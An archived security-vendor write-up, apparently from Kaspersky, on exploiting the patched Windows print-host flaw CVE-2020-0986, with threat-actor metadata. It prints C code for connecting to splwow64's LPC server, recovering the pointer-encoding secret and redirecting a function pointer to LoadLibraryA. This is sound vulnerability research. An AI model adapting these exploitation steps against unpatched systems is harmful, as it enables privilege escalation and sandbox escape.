{ "id": "ac772996-1b00-41c9-86de-23afc619be98", "created_at": "2026-04-06T00:19:19.8395Z", "updated_at": "2026-04-10T03:36:33.410406Z", "deleted_at": null, "sha1_hash": "dcfeac7ff964d5e098e2bc7a7087adda46f01de0", "title": "Operation PowerFall: CVE-2020-0986 and variants", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1893534, "plain_text": "Operation PowerFall: CVE-2020-0986 and variants\r\nBy Boris Larin\r\nPublished: 2020-09-02 · Archived: 2026-04-05 22:03:06 UTC\r\n02 Sep 2020\r\n 8 minute read\r\n Boris Larin\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 1 of 14\n\nIn August 2020, we published a blog post about Operation PowerFall. This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit\r\ntargeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the\r\noriginal blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up\r\npost. Let’s take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and\r\nwhat additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.\r\nCVE-2020-0986\r\nCVE-2020-0986 is an arbitrary pointer dereference vulnerability in GDI Print/Print Spooler API. By using this\r\nvulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of\r\narbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with\r\nmedium integrity level. “Print driver host for applications,” as Microsoft describes splwow64.exe, is a relatively\r\nsmall binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server\r\nthat can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from\r\n32-bit processes. Below I provide the code that can be used to spawn splwow64.exe and connect to\r\nsplwow64.exe’s LPC server.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\ntypedef struct _PORT_VIEW\r\n{\r\nUINT64 Length;\r\nHANDLE SectionHandle;\r\nUINT64 SectionOffset;\r\nUINT64 ViewSize;\r\nUCHAR* ViewBase;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 2 of 14\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\nUCHAR* ViewRemoteBase;\r\n} PORT_VIEW, *PPORT_VIEW;\r\nPORT_VIEW ClientView;\r\ntypedef struct _PORT_MESSAGE_HEADER {\r\nUSHORT DataSize;\r\nUSHORT MessageSize;\r\nUSHORT MessageType;\r\nUSHORT VirtualRangesOffset;\r\nCLIENT_ID ClientId;\r\nUINT64 MessageId;\r\nUINT64 SectionSize;\r\n} PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER;\r\ntypedef struct _PROXY_MSG {\r\nPORT_MESSAGE_HEADER MessageHeader;\r\nUINT64 InputBufSize;\r\nUINT64 InputBuf;\r\nUINT64 OutputBufSize;\r\nUINT64 OutputBuf;\r\nUCHAR Padding[0x1F8];\r\n} PROXY_MSG, *PPORT_MESSAGE;\r\nPROXY_MSG LpcReply;\r\nPROXY_MSG LpcRequest;\r\nint GetPortName(PUNICODE_STRING DestinationString)\r\n{\r\nvoid *tokenHandle;\r\nDWORD sessionId;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 3 of 14\n\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\nULONG length;\r\nint tokenInformation[16];\r\nWCHAR dst[256];\r\nmemset(tokenInformation, 0, sizeof(tokenInformation));\r\nProcessIdToSessionId(GetCurrentProcessId(), \u0026sessionId);\r\nmemset(dst, 0, sizeof(dst));\r\nif (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY,\r\n\u0026tokenHandle)\r\n|| ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation,\r\nsizeof(tokenInformation), \u0026length))\r\n{\r\nreturn 0;\r\n}\r\nwsprintfW(\r\ndst,\r\nL\"\\\\RPC Control\\\\UmpdProxy_%x_%x_%x_%x\",\r\nsessionId,\r\ntokenInformation[2],\r\ntokenInformation[3],\r\n0x2000);\r\nRtlInitUnicodeString(DestinationString, dst);\r\nreturn 1;\r\n}\r\nHANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName)\r\n{\r\nHANDLE sectionHandle = 0;\r\nHANDLE portHandle = 0;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 4 of 14\n\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\nunion _LARGE_INTEGER maximumSize;\r\nmaximumSize.QuadPart = 0x20000;\r\nNtCreateSection(\u0026sectionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0,\r\n\u0026maximumSize, PAGE_READWRITE, SEC_COMMIT, NULL);\r\nif (sectionHandle)\r\n{\r\nClientView.SectionHandle = sectionHandle;\r\nClientView.Length = 0x30;\r\nClientView.ViewSize = 0x9000;\r\nZwSecureConnectPort(\u0026portHandle, PortName, NULL, \u0026ClientView, NULL, NULL, NULL, NULL,\r\nNULL);\r\n}\r\nreturn portHandle;\r\n}\r\nint main()\r\n{\r\nprintf(\"Spawn splwow64.exe\\n\");\r\nCHAR Path[0x100];\r\nGetCurrentDirectoryA(sizeof(Path), Path);\r\nPathAppendA(Path, \"CreateDC.exe\"); // x86 application with call to CreateDC\r\nWinExec(Path, 0);\r\nSleep(1000);\r\nCreateDCW(L\"Microsoft XPS Document Writer\", L\"Microsoft XPS Document Writer\", NULL,\r\nNULL);\r\nprintf(\"Get port name\\n\");\r\nUNICODE_STRING portName;\r\nif (!GetPortName(\u0026portName))\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 5 of 14\n\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\n98\r\n99\r\n100\r\n101\r\n102\r\n103\r\n104\r\n105\r\n106\r\n107\r\n108\r\n109\r\n110\r\n111\r\n{\r\nprintf(\"Failed to get port name\\n\");\r\nreturn 0;\r\n}\r\nprintf(\"Create port\\n\");\r\nHANDLE portHandle = CreatePortSharedBuffer(\u0026portName);\r\nif (!(portHandle \u0026\u0026 ClientView.ViewBase \u0026\u0026 ClientView.ViewRemoteBase))\r\n{\r\nprintf(\"Failed to create port\\n\");\r\nreturn 0;\r\n}\r\n}\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 6 of 14\n\n112\r\nTo send data to the LPC server it’s enough to prepare the printer command in the shared memory region and send\r\nan LPC message with NtRequestWaitReplyPort().\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\nmemset(\u0026LpcRequest, 0, sizeof(LpcRequest));\r\nLpcRequest.MessageHeader.DataSize = 0x20;\r\nLpcRequest.MessageHeader.MessageSize = 0x48;\r\nLpcRequest.InputBufSize = 0x88;\r\nLpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command\r\nLpcRequest.OutputBufSize = 0x10;\r\nLpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize;\r\n// TODO: Prepare printer command\r\nNtRequestWaitReplyPort(portHandle, \u0026LpcRequest, \u0026LpcReply);\r\nWhen the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *).\r\nThis function takes LpcRequest as a parameter and verifies it. After that it allocates a buffer for the printer\r\ncommand and copies it there from shared memory. The printer command function INDEX, which is used to\r\nidentify different driver functions, is stored as a double word at offset 4 in the printer command structure. Almost\r\na complete list of different function INDEX values can be found in the header file winddi.h. This header file\r\nincludes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list\r\nof INDEX values does not end there. Analysis of gdi32full.dll reveals that that are a number of special INDEX\r\nvalues and some of them are provided in the table below (to find them in binary, look for calls to\r\nPROXYPORT::SendRequest).\r\n1\r\n2\r\n3\r\n106 – INDEX_LoadDriver\r\n107 - INDEX_UnloadDriver\r\n109 – INDEX_DocumentEvent\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 7 of 14\n\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n110 – INDEX_StartDocPrinterW\r\n111 – INDEX_StartPagePrinter\r\n112 – INDEX_EndPagePrinter\r\n113 – INDEX_EndDocPrinter\r\n114 – INDEX_AbortPrinter\r\n115 – INDEX_ResetPrinterW\r\n116 – INDEX_QueryColorProfile\r\nFunction TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and if it passes the\r\nchecks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.\r\n1\r\n2\r\n3\r\n4\r\n5\r\nif ( IsKernelMsg || INDEX \u003e= 106 \u0026\u0026 (INDEX \u003c= 107 || INDEX - 109 \u003c= 7))\r\n{\r\n    // …\r\n    GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize);\r\n}\r\nGdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and\r\nthe handler for one of them – namely INDEX_DocumentEvent – contains vulnerability CVE-2020-0986. The\r\nhandler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable\r\nfrom the LPC client) to check that the command is intended for a printer with a valid handle. After the check it\r\nwill use the function DecodePointer to decode the pointer of the function stored at the fpDocumentEvent global\r\nvariable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call\r\nto memcpy() where source, destination and size arguments are obtained from the printer command and are fully\r\ncontrollable by the attacker.\r\nExploitation\r\nIn Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of\r\nthis vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the\r\nfpDocumentEvent pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv.\r\nAfter that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent\r\ncommands to leak the value of the fpDocumentEvent pointer. The value of the raw pointer is protected using\r\nEncodePointer protection, but the function pointed to by this raw pointer is executed each time the\r\nINDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 8 of 14\n\nthe fpDocumentEvent pointer the best candidate for an overwrite. A necessary step for exploitation is to encode\r\nour own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have\r\nthe value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function\r\nfrom winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to\r\nencode our own pointer. The necessary calculations are provided below.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n// Calculate secret for pointer encoding\r\nwhile (1)\r\n{\r\nsecret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i \u0026 0x3F);\r\nif ((secret \u0026 0x3F) == i \u0026\u0026 __ROR8__((UINT64)DocumentEvent ^ secret, secret \u0026 0x3F) == *\r\n(UINT64*)leaked_fpDocumentEvent)\r\nbreak;\r\nif (++i \u003e 0x3F)\r\n{\r\nsecret = 0;\r\nbreak;\r\n}\r\n}\r\n// Encode LoadLibraryA pointer with calculated secret\r\nUINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret \u0026 0x3F);\r\nAt this stage, in order to achieve code execution from the splwow64.exe process, it’s sufficient to overwrite the\r\nfpDocumentEvent pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to\r\nload in the next LPC request with the INDEX_DocumentEvent command.\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 9 of 14\n\nOverview of attack\r\nCVE-2019-0880\r\nAnalysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available here. It’s another vulnerability that was exploited as an\r\nin-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same\r\nGdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to\r\nbelieve that the developers didn’t notice the existence of a variant for this vulnerability, so why was CVE-2020-\r\n0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but\r\nGdiPrinterThunk is totally broken. Even fixing a couple of calls to memcpy doesn’t really help.\r\nArbitrary pointer dereference host for applications\r\nThe problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential\r\narbitrary pointer dereference vulnerability. Let’s take a look again at the format of the LPC request message.\r\n1\r\n2\r\n3\r\n4\r\ntypedef struct _PROXY_MSG {\r\nPORT_MESSAGE_HEADER MessageHeader;\r\nUINT64 InputBufSize;\r\nUINT64 InputBuf;\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 10 of 14\n\n5\r\n6\r\n7\r\n8\r\nUINT64 OutputBufSize;\r\nUINT64 OutputBuf;\r\nUCHAR Padding[0x1F8];\r\n} PROXY_MSG, *PPORT_MESSAGE;\r\nInputBuf and OutputBuf are both pointers that should point to a shared memory region. InputBuf points to a\r\nlocation where the printer command is prepared, and when this command is processed by GdiPrinterThunk the\r\nresult might be written back to the LPC client using the pointer that was provided as OutputBuf. Many handlers\r\nfor different INDEX values provide data to the LPC client, but the problem is that the pointers InputBuf and\r\nOutputBuf are fully controllable from the LPC client and manipulation of the OutputBuf pointer can lead to an\r\noverwrite of splwow64.exe’s process memory.\r\nHow it was mitigated\r\nMicrosoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of OutputBuf\r\nvulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data\r\nprovided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the\r\npatch the format of the printer command was changed so it no longer contains the address of the handle table, but\r\ninstead contains a valid driver ID (quad word at offset 0x18). Now the linked list of handle tables is stored inside\r\nthe splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a\r\nhandle table securely. For a printer command to be processed it should contain a valid printer handle (quad word\r\nat offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer\r\ndriver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on\r\nthis implementation seems to be unlikely. So, it’s safe to assume that this bug class was properly mitigated.\r\nHowever, there are still a couple of places in the code where it is possible to write a 0 for the address provided as\r\nOutputBuf without a handle check, but exploitation in such a scenario doesn’t appear to be feasible.\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 11 of 14\n\nLatest Webinars\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 12 of 14\n\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 13 of 14\n\nReports\r\nKaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka\r\nMustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer.\r\nKaspersky discloses a 2025 HoneyMyte (aka Mustang Panda or Bronze President) APT campaign, which uses a\r\nkernel-mode rootkit to deliver and protect a ToneShell backdoor.\r\nKaspersky GReAT experts analyze the Evasive Panda APT’s infection chain, including shellcode encrypted with\r\nDPAPI and RC5, as well as the MgBot implant.\r\nKaspersky expert describes new malicious tools employed by the Cloud Atlas APT, including implants of their\r\nsignature backdoors VBShower, VBCloud, PowerShower, and CloudAtlas.\r\nSource: https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nhttps://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/" ], "report_names": [ "98329" ], "threat_actors": [ { "id": "77b28afd-8187-4917-a453-1d5a279cb5e4", "created_at": "2022-10-25T15:50:23.768278Z", "updated_at": "2026-04-10T02:00:05.266635Z", "deleted_at": null, "main_name": "Inception", "aliases": [ "Inception Framework", "Cloud Atlas" ], "source_name": "MITRE:Inception", "tools": [ "PowerShower", "VBShower", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "04a7ebaa-ebb1-4971-b513-a0c86886d932", "created_at": "2023-01-06T13:46:38.784965Z", "updated_at": "2026-04-10T02:00:03.099088Z", "deleted_at": null, "main_name": "Inception Framework", "aliases": [ "Clean Ursa", "Cloud Atlas", "G0100", "ATK116", "Blue Odin" ], "source_name": "MISPGALAXY:Inception Framework", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f35997d9-ca1e-453f-b968-0e675cc16d97", "created_at": "2023-01-06T13:46:39.490819Z", "updated_at": "2026-04-10T02:00:03.345364Z", "deleted_at": null, "main_name": "Evasive Panda", "aliases": [ "BRONZE HIGHLAND" ], "source_name": "MISPGALAXY:Evasive Panda", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c0cedde3-5a9b-430f-9b77-e6568307205e", "created_at": "2022-10-25T16:07:23.528994Z", "updated_at": "2026-04-10T02:00:04.642473Z", "deleted_at": null, "main_name": "DarkHotel", "aliases": [ "APT-C-06", "ATK 52", "CTG-1948", "Dubnium", "Fallout Team", "G0012", "G0126", "Higaisa", "Luder", "Operation DarkHotel", "Operation Daybreak", "Operation Inexsmar", "Operation PowerFall", "Operation The Gh0st Remains the Same", "Purple Pygmy", "SIG25", "Shadow Crane", "T-APT-02", "TieOnJoe", "Tungsten Bridge", "Zigzag Hail" ], "source_name": "ETDA:DarkHotel", "tools": [ "Asruex", "DarkHotel", "DmaUp3.exe", "GreezeBackdoor", "Karba", "Nemain", "Nemim", "Ramsay", "Retro", "Tapaoux", "Trojan.Win32.Karba.e", "Virus.Win32.Pioneer.dx", "igfxext.exe", "msieckc.exe" ], "source_id": "ETDA", "reports": null }, { "id": "05cb998c-6e81-47f0-9806-ee4fda72fe0a", "created_at": "2024-11-01T02:00:52.763555Z", "updated_at": "2026-04-10T02:00:05.263997Z", "deleted_at": null, "main_name": "Daggerfly", "aliases": [ "Daggerfly", "Evasive Panda", "BRONZE HIGHLAND" ], "source_name": "MITRE:Daggerfly", "tools": [ "PlugX", "MgBot", "BITSAdmin", "MacMa", "Nightdoor" ], "source_id": "MITRE", "reports": null }, { "id": "812f36f8-e82b-41b6-b9ec-0d23ab0ad6b7", "created_at": "2023-01-06T13:46:39.413725Z", "updated_at": "2026-04-10T02:00:03.31882Z", "deleted_at": null, "main_name": "BRONZE HIGHLAND", "aliases": [ "Evasive Panda", "Daggerfly" ], "source_name": "MISPGALAXY:BRONZE HIGHLAND", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "19ac84cc-bb2d-4e0c-ace0-5a7659d89ac7", "created_at": "2022-10-25T16:07:23.422755Z", "updated_at": "2026-04-10T02:00:04.592069Z", "deleted_at": null, "main_name": "Bronze Highland", "aliases": [ "Daggerfly", "Digging Taurus", "Evasive Panda", "Storm Cloud", "StormBamboo", "TAG-102", "TAG-112" ], "source_name": "ETDA:Bronze Highland", "tools": [ "Agentemis", "CDDS", "CloudScout", "Cobalt Strike", "CobaltStrike", "DazzleSpy", "KsRemote", "LOLBAS", "LOLBins", "Living off the Land", "MacMa", "Macma", "MgBot", "Mgmbot", "NetMM", "Nightdoor", "OSX.CDDS", "POCOSTICK", "RELOADEXT", "Suzafk", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "4f7d2815-7504-4818-bf8d-bba18161b111", "created_at": "2025-08-07T02:03:24.613342Z", "updated_at": "2026-04-10T02:00:03.732192Z", "deleted_at": null, "main_name": "BRONZE HIGHLAND", "aliases": [ "Daggerfly", "Daggerfly ", "Evasive Panda ", "Evasive Panda ", "Storm Bamboo " ], "source_name": "Secureworks:BRONZE HIGHLAND", "tools": [ "Cobalt Strike", "KsRemote", "Macma", "MgBot", "Nightdoor", "PlugX" ], "source_id": "Secureworks", "reports": null }, { "id": "02c9f3f6-5d10-456b-9e63-750286048149", "created_at": "2022-10-25T16:07:23.722884Z", "updated_at": "2026-04-10T02:00:04.72726Z", "deleted_at": null, "main_name": "Inception Framework", "aliases": [ "ATK 116", "Blue Odin", "Clean Ursa", "Cloud Atlas", "G0100", "Inception Framework", "Operation Cloud Atlas", "Operation RedOctober", "The Rocra" ], "source_name": "ETDA:Inception Framework", "tools": [ "Lastacloud", "PowerShower", "VBShower" ], "source_id": "ETDA", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434759, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dcfeac7ff964d5e098e2bc7a7087adda46f01de0.pdf", "text": "https://archive.orkl.eu/dcfeac7ff964d5e098e2bc7a7087adda46f01de0.txt", "img": "https://archive.orkl.eu/dcfeac7ff964d5e098e2bc7a7087adda46f01de0.jpg" } }